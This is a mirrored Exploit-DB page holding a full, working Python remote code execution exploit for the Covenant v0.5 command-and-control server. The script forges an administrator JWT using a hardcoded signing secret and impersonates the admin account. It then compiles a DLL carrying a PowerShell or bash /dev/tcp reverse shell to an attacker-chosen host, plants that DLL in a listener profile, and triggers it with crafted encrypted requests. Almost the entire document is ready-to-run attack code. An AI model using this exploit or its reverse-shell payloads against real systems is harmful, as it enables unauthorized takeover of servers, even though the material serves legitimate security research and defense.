6

[webapps] Covenant v0.5 - Remote Code Execution (RCE)

 1 year ago
source link: https://www.exploit-db.com/exploits/51141
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Covenant v0.5 - Remote Code Execution (RCE)

EDB-ID:

51141

EDB Verified:


Exploit:

  /  

Platform:

Multiple

Date:

2023-03-30

Vulnerable App:

# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
# Exploit Author: xThaz
# Author website: https://xthaz.fr/
# Date: 2022-09-11
# Vendor Homepage: https://cobbr.io/Covenant.html
# Software Link: https://github.com/cobbr/Covenant
# Version: v0.1.3 - v0.5
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker

# Vulnerability
## Discoverer: coastal
## Date: 2020-07-13
## Discoverer website: https://blog.null.farm
## References:
##   - https://blog.null.farm/hunting-the-hunters
##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb

# !/usr/bin/env python3
# encoding: utf-8


import jwt  # pip3 install PyJWT
import json
import warnings
import base64
import re
import random
import argparse

from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodome
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request  # pip3 install requests
from subprocess import run
from pwn import remote, context  # pip3 install pwntools
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time


def check_requirements():
    if which("mcs") is None:
        print("Please install the mono framework in order to compile the payload.")
        print("https://www.mono-project.com/download/stable/")
        exit(-1)


def random_hex(length):
    alphabet = "0123456789abcdef"
    return ''.join(random.choice(alphabet) for _ in range(length))


def request_api(method, token, route, body=""):
    warnings.simplefilter('ignore', InsecureRequestWarning)

    return request(
        method,
        f"{args.target}/api/{route}",
        json=body,
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        },
        verify=False
    )


def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'

    payload_data = {
        "sub": username,
        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
            "User",
            "Administrator"
        ],
        "exp": int(time()) + 360,
        "iss": "Covenant",
        "aud": "Covenant"
    }

    token = jwt.encode(payload_data, secret_key, algorithm='HS256')
    return token


def get_id_admin(token, json_roles):
    id_admin = ""
    for role in json_roles:
        if role["name"] == "Administrator":
            id_admin = role["id"]
            print(f"\t[*] Found the admin group id : {id_admin}")
            break
    else:
        print("\t[!] Did not found admin group id, quitting !")
        exit(-1)

    id_admin_user = ""
    json_users_roles = request_api("get", token, f"users/roles").json()
    for user_role in json_users_roles:
        if user_role["roleId"] == id_admin:
            id_admin_user = user_role["userId"]
            print(f"\t[*] Found the admin user id : {id_admin_user}")
            break
    else:    
        print("\t[!] Did not found admin id, quitting !")
        exit(-1)

    json_users = request_api("get", token, f"users").json()
    for user in json_users:
        if user["id"] == id_admin_user:
            username_admin = user["userName"]
            print(f"\t[*] Found the admin username : {username_admin}")
            return username_admin, id_admin_user
    else:    
        print("\t[!] Did not found admin username, quitting !")
        exit(-1)


def compile_payload():
    if args.os == "windows":
        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
    else:
        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'

    dll = """using System;
using System.Reflection;

namespace ExampleDLL{
    public class Class1{
        public Class1(){
        }

        public void Main(string[] args){
            System.Diagnostics.Process.Start(""" + payload + """);
        }
    }
}
"""

    temp_dll_path = f"/tmp/{random_hex(8)}"
    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
    print(f"\t[*] Writing payload in {temp_dll_path}.cs")

    compilo_path = which("mcs")
    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
    if compilation.returncode:
        print("\t[!] Error when compiling DLL, quitting !")
        exit(-1)
    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")

    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()

    remove(temp_dll_path + ".cs")
    remove(temp_dll_path + ".dll")
    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
    return dll_encoded


def generate_wrapper(dll_encoded):
    wrapper = """public static class MessageTransform {
    public static string Transform(byte[] bytes) {
        try {
            string assemblyBase64 = \"""" + dll_encoded + """\";
            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
            var assembly = System.Reflection.Assembly.Load(assemblyBytes);
            foreach (var type in assembly.GetTypes()) {
                object instance = System.Activator.CreateInstance(type);
                object[] args = new object[] { new string[] { \"\" } };
                try {
                    type.GetMethod(\"Main\").Invoke(instance, args);
                }
                catch {}
            }
        }
        catch {}
        return System.Convert.ToBase64String(bytes);
    }

    public static byte[] Invert(string str) {
        return System.Convert.FromBase64String(str);
    }
}"""

    return wrapper


def upload_profile(token, wrapper):
    body = {
        'httpUrls': [
            '/en-us/index.html',
            '/en-us/docs.html',
            '/en-us/test.html'
        ],
        'httpRequestHeaders': [
            {'name': 'User-Agent',
             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
                      'Safari/537.36'},
            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
        ],
        'httpResponseHeaders': [
            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
        ],
        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
        'httpGetResponse': '{DATA}',
        'httpPostResponse': '{DATA}',
        'id': 0,
        'name': random_hex(8),
        'description': '',
        'type': 'HTTP',
        'messageTransform': wrapper
    }

    response = request_api("post", token, "profiles/http", body)

    if not response.ok:
        print("\t[!] Failed to create the listener profile, quitting !")
        exit(-1)
    else:
        profile_id = response.json().get('id')
        print(f"\t[*] Profile created with id {profile_id}")
        print("\t[*] Successfully created the listener profile")
        return profile_id


def generate_valid_listener_port(impersonate_token, tries=0):
    if tries >= 10:
        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
        exit(-1)

    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT
    listeners = request_api("get", impersonate_token, "listeners").json()

    port_used = []
    for listener in listeners:
        port_used.append(listener["bindPort"])

    if port in port_used:
        print(f"\t[!] Port {port} is already taken by another listener, retrying !")
        generate_valid_listener_port(impersonate_token, tries + 1)
    else:
        print(f"\t[*] Port {port} seems free")
        return port


def get_id_listener_type(impersonate_token, listener_name):
    response = request_api("get", impersonate_token, "listeners/types")
    if not response.ok:
        print("\t[!] Failed to get the listener type, quitting !")
        exit(-1)
    else:
        for listener_type in response.json():
            if listener_type["name"] == listener_name:
                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
                return listener_type["id"]


def generate_listener(impersonate_token, profile_id):
    listener_port = generate_valid_listener_port(impersonate_token)
    listener_name = random_hex(8)
    data = {
        'useSSL': False,
        'urls': [
            f"http://0.0.0.0:{listener_port}"
        ],
        'id': 0,
        'name': listener_name,
        'bindAddress': "0.0.0.0",
        'bindPort': listener_port,
        'connectAddresses': [
            "0.0.0.0"
        ],
        'connectPort': listener_port,
        'profileId': profile_id,
        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
        'status': 'Active'
    }

    response = request_api("post", impersonate_token, "listeners/http", data)

    if not response.ok:
        print("\t[!] Failed to create the listener, quitting !")
        exit(-1)
    else:
        print("\t[*] Successfully created the listener")
        listener_id = response.json().get("id")
        return listener_id, listener_port


def create_grunt(impersonate_token, data):
    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
    if stager_code == "":
        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
        if stager_code == "":
            print("\t[!] Failed to create the grunt payload, quitting !")
            exit(-1)

    print("\t[*] Successfully created the grunt payload")
    return stager_code


def get_grunt_config(impersonate_token, listener_id):
    data = {
        'id': 0,
        'listenerId': listener_id,
        'implantTemplateId': 1,
        'name': 'Binary',
        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
        'type': 'binary',
        'dotNetVersion': 'Net35',
        'runtimeIdentifier': 'win_x64',
        'validateCert': True,
        'useCertPinning': True,
        'smbPipeName': 'string',
        'delay': 0,
        'jitterPercent': 0,
        'connectAttempts': 0,
        'launcherString': 'GruntHTTP.exe',
        'outputKind': 'consoleApplication',
        'compressStager': False
    }

    stager_code = create_grunt(impersonate_token, data)
    aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
    if not aes_key or not guid_prefix:
        print("\t[!] Failed to retrieve the grunt configuration, quitting !")
        exit(-1)

    aes_key = aes_key.group(1)
    guid_prefix = guid_prefix.group(1)
    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
    return aes_key, guid_prefix


def aes256_cbc_encrypt(key, message):
    iv_bytes = urandom(16)
    key_decoded = base64.b64decode(key)
    encoded_message = pad(message.encode(), 16)

    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
    encrypted = cipher.encrypt(encoded_message)

    hmac = HMAC.new(key_decoded, digestmod=SHA256)
    signature = hmac.update(encrypted).digest()

    return encrypted, iv_bytes, signature


def trigger_exploit(listener_port, aes_key, guid):
    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"

    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
    data = {
        "GUID": guid,
        "Type": 0,
        "Meta": '',
        "IV": base64.b64encode(iv).decode(),
        "EncryptedMessage": base64.b64encode(ciphered).decode(),
        "HMAC": base64.b64encode(signature).decode()
    }

    json_data = json.dumps(data).encode("utf-8")
    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"

    if send_exploit(listener_port, "Cookie", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
    else :
        print("\t[!] Exploit failed, retrying")
        if send_exploit(listener_port, "Cookies", guid, payload):
            print("\t[*] Exploit succeeded, check listener")
        else:
            print("\t[!] Exploit failed, quitting")


def send_exploit(listener_port, header_cookie, guid, payload):
    context.log_level = 'error'

    request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()

    sock = remote(IP_TARGET, listener_port)
    sock.sendline(request)
    response = sock.recv().decode()
    sock.close()

    if "HTTP/1.1 200 OK" in response:
        return True
    else:
        return False

if __name__ == "__main__":
    check_requirements()

    parser = argparse.ArgumentParser()
    parser.add_argument("target",
                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
    parser.add_argument("os",
                        help="Operating System of the target",
                        choices=["windows", "linux"])
    parser.add_argument("lhost",
                        help="IP of the machine that will receive the reverse shell")
    parser.add_argument("lport",
                        help="Port of the machine that will receive the reverse shell")
    args = parser.parse_args()

    IP_TARGET = urlparse(args.target).hostname

    print("[*] Getting the admin info")
    sacrificial_token = craft_jwt("xThaz")
    roles = request_api("get", sacrificial_token, "roles").json()
    admin_username, admin_id = get_id_admin(sacrificial_token, roles)
    impersonate_token = craft_jwt(admin_username, admin_id)
    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")

    print("[*] Generating payload")
    dll_encoded = compile_payload()
    wrapper = generate_wrapper(dll_encoded)
    print("[*] Uploading malicious listener profile")
    profile_id = upload_profile(impersonate_token, wrapper)

    print("[*] Generating listener")
    listener_id, listener_port = generate_listener(impersonate_token, profile_id)

    print("[*] Triggering the exploit")
    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")
            

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK